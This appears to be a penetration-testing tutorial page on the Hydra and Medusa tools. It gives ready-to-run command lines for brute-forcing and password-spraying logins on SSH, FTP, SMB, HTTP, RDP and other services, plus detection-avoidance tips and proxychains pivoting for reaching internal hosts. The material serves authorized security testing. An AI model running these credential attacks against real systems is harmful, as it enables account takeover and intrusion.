Home > Network Pentesting

Hydra / Medusa

Hydra and Medusa are fast, flexible, and widely used password-cracking and authentication brute-forcing tools. They test credentials against online services such as SSH, FTP, RDP, MySQL, SMB, Telnet, HTTP logins, SMTP, POP3, and many more. Pentesters use these tools to identify weak passwords, validate leaked credentials, and perform targeted password-spray attacks during internal assessments. This chapter explains how both tools work, when to use them, and how to perform controlled brute-force operations without causing account lockouts.

Understanding Hydra and Medusa

Hydra and Medusa perform online authentication attacks by:

  • Trying username/password combinations

  • Testing wordlists against network services

  • Validating leaked or captured credentials

  • Identifying weak accounts

  • Assessing password policy strength

  • Supporting parallel, multi-threaded authentication attempts

Hydra is older and extremely flexible.
Medusa is newer, highly modular, and optimized for speed on large-scale attacks.

Both tools require careful use to avoid detection or account lockouts.

Preparing for Brute-Force Attacks

Before performing any login testing:

  • Identify password policy

  • Check lockout thresholds

  • Confirm allowed authentication attempts

  • Use safe timing and low thread counts

  • Test only authorized systems

Blind or aggressive brute-force attempts can cause outages during real engagements.

Hydra Basics

Hydra supports dozens of protocols and is highly customizable.

Basic Username + Password Test

hydra -l user -p password 10.10.20.5 ssh

Multiple Users

hydra -L users.txt -p password 10.10.20.5 ssh

Multiple Passwords

hydra -l user -P passwords.txt 10.10.20.5 ssh

Full Spray

hydra -L users.txt -P passwords.txt 10.10.20.5 ssh

Hydra tries combinations until a valid credential is found.

Hydra for Different Services

SSH

hydra -L users.txt -P passwords.txt ssh://10.10.20.5

FTP

hydra -L users.txt -P passwords.txt ftp://10.10.20.5

SMB

hydra -L users.txt -P passwords.txt smb://10.10.20.5

HTTP POST Login

hydra -l admin -P pass.txt 10.10.20.5 http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"

Hydra requires specifying failure conditions (F=) for web logins.

Hydra Advanced Options

Set Thread Count

hydra -t 4 -L users.txt -P pass.txt ssh://10.10.20.5

Low thread counts reduce detection risk.

Continue After Success

hydra -f -L users.txt -P pass.txt ssh://10.10.20.5

Verbose Output

hydra -vV -L users.txt -P pass.txt ssh://10.10.20.5

Verbose mode shows each attempt.

Medusa Basics

Medusa is designed for large, fast authentication testing with strong module support.

Basic Authentication Test

medusa -h 10.10.20.5 -u user -p password -M ssh

Multiple Users

medusa -h 10.10.20.5 -U users.txt -p password -M ssh

Multiple Passwords

medusa -h 10.10.20.5 -u user -P pass.txt -M ssh

Full Credential Spray

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M ssh

Medusa is extremely fast when targeting large user lists.

Medusa for Different Services

SMB

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M smbnt

FTP

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M ftp

HTTP Basic Auth

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M http

RDP (via rdp module)

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M rdp

Medusa is highly modular, and modules behave consistently across services.

Password Spraying (Safe Method)

Password spraying tests one password across many accounts to avoid lockouts.

Hydra Spray

hydra -L users.txt -p "Winter2025" 10.10.20.5 smb

Medusa Spray

medusa -h 10.10.20.5 -U users.txt -p "Winter2025" -M smbnt

Spraying one password is safer than testing many passwords per user.

Brute-Force Against Protected Services

Some services require slower or rate-limited approaches:

SSH Slow Rate (Avoid Lockouts)

hydra -t 1 -W 5 -L users.txt -P passes.txt ssh://10.10.20.5

HTTP with CSRF, Tokens, or Captcha

(Not feasible with Hydra/Medusa; use BurpSuite instead.)

SMB Lockout Risk

Windows often locks accounts after 5–10 failed attempts.
Use spraying instead of full brute-force.

Analyzing Results

Successful attempts look like:

Hydra

[22][ssh] host: 10.10.20.5   login: user  password: pass123

Medusa

ACCOUNT FOUND: [ssh] Host:10.10.20.5 User:user Password:pass123

Log and store these credentials for:

  • lateral movement

  • privilege escalation

  • authentication relays

  • internal service mapping

Using Hydra/Medusa With Proxychains

During pivoting, brute-force may run through tunnels.

Example

proxychains hydra -L u.txt -P p.txt ssh://10.10.20.50

This allows testing internal hosts reachable only through SOCKS tunnels.

Best Practices for Stealth and Safety

  • Always check lockout policies first

  • Use low threads to avoid noise

  • Use spraying instead of brute-force

  • Randomize timing using wrapper scripts

  • Run tests during off-peak hours

  • Target only authorized machines

Risky brute-force behavior can lead to detection or disruptions.

Why Hydra and Medusa Mastery Matters

Hydra and Medusa give pentesters:

  • Fast credential testing ability

  • Deep protocol support

  • Automated password audits

  • Reliable testing for weak account security

  • Scalable brute-force capabilities

  • Integration with pivoting tunnels

  • Low-level authentication insight

Weak passwords are one of the most common internal vulnerabilities.
Hydra and Medusa expose them quickly and efficiently.

Intel Dump

  • Hydra: flexible, supports many protocols

  • Medusa: very fast, modular, ideal for large-scale attacks

  • Supports SSH, SMB, FTP, HTTP, RDP, SQL, and more

  • Password spraying avoids lockouts

  • Proxychains enables internal brute-forcing

  • Tools identify weak or leaked credential pairs

  • Mastery enables efficient lateral movement and escalation

HOME COMMUNITY CAREERS DASHBOARD